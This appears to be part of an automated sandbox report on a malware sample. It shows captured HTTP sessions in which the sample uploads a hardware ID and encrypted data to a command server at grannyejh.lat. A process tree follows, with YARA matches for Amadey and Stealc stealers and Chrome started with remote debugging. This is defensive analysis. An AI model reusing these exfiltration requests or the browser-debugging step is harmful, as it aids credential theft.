                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:30 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=ZKKZ0BEN6XE7
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 1259
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:30 UTC1259OUTData Raw: 2d 2d 5a 4b 4b 5a 30 42 45 4e 36 58 45 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 4b 4b 5a 30 42 45 4e 36 58 45 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 4b 4b 5a 30 42 45 4e 36 58 45 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 5a 4b 4b 5a 30 42 45 4e 36 58 45 37 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: --ZKKZ0BEN6XE7Content-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--ZKKZ0BEN6XE7Content-Disposition: form-data; name="pid"1--ZKKZ0BEN6XE7Content-Disposition: form-data; name="lid"PsFKDg--pablo--ZKKZ0BEN6XE7
                                                                                                                                                                                                                                                          2024-12-19 13:27:30 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:30 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=g4bqp131btnuhalh9hmbo47vdg; expires=Mon, 14 Apr 2025 07:14:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t3qqI2akRSJBxdQdLUipONqjQ6USvoll9%2BXYjSbEDXllo3bibyk3Pyj%2BkhO%2BpEdEN2JMy3zTzfN8uZUNCKByAqrk3VyRl4LWln4VOh9U7KQEcDbfMV%2FCk8ka2K%2BqVVCl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47bafef85a437e-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1698&rtt_var=651&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2829&recv_bytes=2167&delivery_rate=1662870&cwnd=236&unsent_bytes=0&cid=6832897315600f8b&ts=793&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:27:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          56192.168.2.450276172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:32 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=5CKSX1C3WFDT58J6XB
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 29573
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:32 UTC15331OUTData Raw: 2d 2d 35 43 4b 53 58 31 43 33 57 46 44 54 35 38 4a 36 58 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 43 4b 53 58 31 43 33 57 46 44 54 35 38 4a 36 58 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 43 4b 53 58 31 43 33 57 46 44 54 35 38 4a 36 58 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                                                                                                                                                                          Data Ascii: --5CKSX1C3WFDT58J6XBContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--5CKSX1C3WFDT58J6XBContent-Disposition: form-data; name="pid"1--5CKSX1C3WFDT58J6XBContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                                                                                                                                                                          2024-12-19 13:27:32 UTC14242OUTData Raw: 2a 40 d5 15 bc a3 14 96 1b 59 e7 f3 0d 82 16 5a 1a 87 f0 c2 a0 61 e1 bb b5 85 a4 a2 be b7 6e dc 5a 89 c9 6f 0d 37 33 24 7c f5 12 29 1e 50 51 4b c2 da c6 6e f9 6d 37 3e ba 07 00 b9 05 ae d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f
                                                                                                                                                                                                                                                          Data Ascii: *@YZanZo73$|)PQKnm7>5OEK?6V,i<0egW\ro`#R\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_|x5mDom;z/
                                                                                                                                                                                                                                                          2024-12-19 13:27:33 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:33 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=mb38np5ngg6pfuj9vlg16alvvc; expires=Mon, 14 Apr 2025 07:14:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2Fk8k%2F%2FksvS8Gj7a3h9yW456kG%2FjHAMVwVOyTypZ7edLIhofbETZF8EjOojrckJLsHIx2YYpJibAweyL6CAAYQJEdtGgxCCuep6FeO899yvmmBx9J81kEUcqzXZ13K7x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47bb0c18510f39-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1666&rtt_var=625&sent=19&recv=35&lost=0&retrans=0&sent_bytes=2830&recv_bytes=30554&delivery_rate=1750599&cwnd=249&unsent_bytes=0&cid=2901cb391370afae&ts=952&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:27:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          57192.168.2.450277172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:34 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 82
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:34 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=4D9AEFC7455232ACAC8923850305D13E
                                                                                                                                                                                                                                                          2024-12-19 13:27:35 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:35 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=3truuavt0fnflg3019nujqvrm0; expires=Mon, 14 Apr 2025 07:14:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tUJJZV4vlNuWFNFx%2B8vzagfgYiv8%2BngJlMhi3chTuHqHwG%2Fqw7967OMNXOPH2VMRJHS0jWpYuPm94VZWyWBcyNRbqXPYQEuuZCy2yjR6G5Ah4ABE7Vl6YIFdx91uEt%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47bb1a4a02432b-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1750&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=979&delivery_rate=1668571&cwnd=189&unsent_bytes=0&cid=7ba23b3265aa2961&ts=794&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:35 UTC214INData Raw: 64 30 0d 0a 48 34 66 6c 50 43 5a 75 54 64 78 63 36 32 51 53 62 4b 48 62 4c 78 6a 6c 58 6e 6f 36 49 6c 63 6c 57 56 72 52 30 65 48 48 70 52 6c 45 2f 4d 64 4a 42 46 52 76 74 43 69 66 46 43 67 77 6a 6f 63 41 4b 64 31 72 56 41 67 54 59 67 74 6f 61 2b 4c 2f 30 50 48 35 4e 6e 44 68 67 32 41 4a 43 69 69 36 63 6f 34 63 64 30 36 4e 2b 55 6c 73 78 32 52 4b 46 67 41 79 42 32 4e 71 72 50 32 61 35 64 41 37 4a 61 57 4e 53 46 49 65 64 34 42 7a 74 30 73 6a 56 4a 54 31 48 53 6e 51 63 45 73 4c 45 58 6b 55 62 77 62 2b 6f 70 57 69 78 48 52 44 71 4a 64 64 53 41 6f 69 73 58 4b 4f 48 48 64 4f 6a 66 6c 4a 62 4d 64 6b 53 68 59 41 4d 67 64 6a 61 71 79 4d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: d0H4flPCZuTdxc62QSbKHbLxjlXno6IlclWVrR0eHHpRlE/MdJBFRvtCifFCgwjocAKd1rVAgTYgtoa+L/0PH5NnDhg2AJCii6co4cd06N+Ulsx2RKFgAyB2NqrP2a5dA7JaWNSFIed4Bzt0sjVJT1HSnQcEsLEXkUbwb+opWixHRDqJddSAoisXKOHHdOjflJbMdkShYAMgdjaqyM
                                                                                                                                                                                                                                                          2024-12-19 13:27:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                          Start time:08:20:04
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\Tii6ue74NB.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Tii6ue74NB.exe"
                                                                                                                                                                                                                                                          Imagebase:0xdf0000
                                                                                                                                                                                                                                                          File size:7'292'928 bytes
                                                                                                                                                                                                                                                          MD5 hash:61FD8B1C2C9984F10C6B263504F6E794
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                          Start time:08:20:05
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exe
                                                                                                                                                                                                                                                          Imagebase:0x620000
                                                                                                                                                                                                                                                          File size:5'476'352 bytes
                                                                                                                                                                                                                                                          MD5 hash:C597FB849B6B2BB18895B7D0337644D7
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                          Start time:08:20:05
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exe
                                                                                                                                                                                                                                                          Imagebase:0x3e0000
                                                                                                                                                                                                                                                          File size:3'714'560 bytes
                                                                                                                                                                                                                                                          MD5 hash:B2F8BAD322CF8F7619A7C5FF151C984B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                          Start time:08:20:06
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exe
                                                                                                                                                                                                                                                          Imagebase:0x6b0000
                                                                                                                                                                                                                                                          File size:3'008'512 bytes
                                                                                                                                                                                                                                                          MD5 hash:EB5E8AF364226452A7B60CFDF34CE69B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.1853056053.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                          Start time:08:20:10
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                          Imagebase:0x610000
                                                                                                                                                                                                                                                          File size:3'008'512 bytes
                                                                                                                                                                                                                                                          MD5 hash:EB5E8AF364226452A7B60CFDF34CE69B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000003.1898311651.0000000005180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                          Start time:08:20:13
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exe
                                                                                                                                                                                                                                                          Imagebase:0xaa0000
                                                                                                                                                                                                                                                          File size:1'865'216 bytes
                                                                                                                                                                                                                                                          MD5 hash:C55AABF570C84E3060DF0D997F2BFB33
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                          Start time:08:20:16
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                          Start time:08:20:20
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          Imagebase:0xca0000
                                                                                                                                                                                                                                                          File size:2'940'416 bytes
                                                                                                                                                                                                                                                          MD5 hash:527B76DD8DE1219705E08C1B7201AE32
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000A.00000002.2486440512.0000000000CA1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2492560230.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000A.00000002.2492560230.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000A.00000003.1976633314.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                          Start time:08:20:24
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\"
                                                                                                                                                                                                                                                          Imagebase:0x7ff7f7550000
                                                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                          Start time:08:20:26
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe"
                                                                                                                                                                                                                                                          Imagebase:0x6b0000
                                                                                                                                                                                                                                                          File size:1'880'576 bytes
                                                                                                                                                                                                                                                          MD5 hash:FF279F4E5B1C6FBDA804D2437C2DBDC8
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                          • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                          Start time:08:20:32
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                          Start time:08:20:32
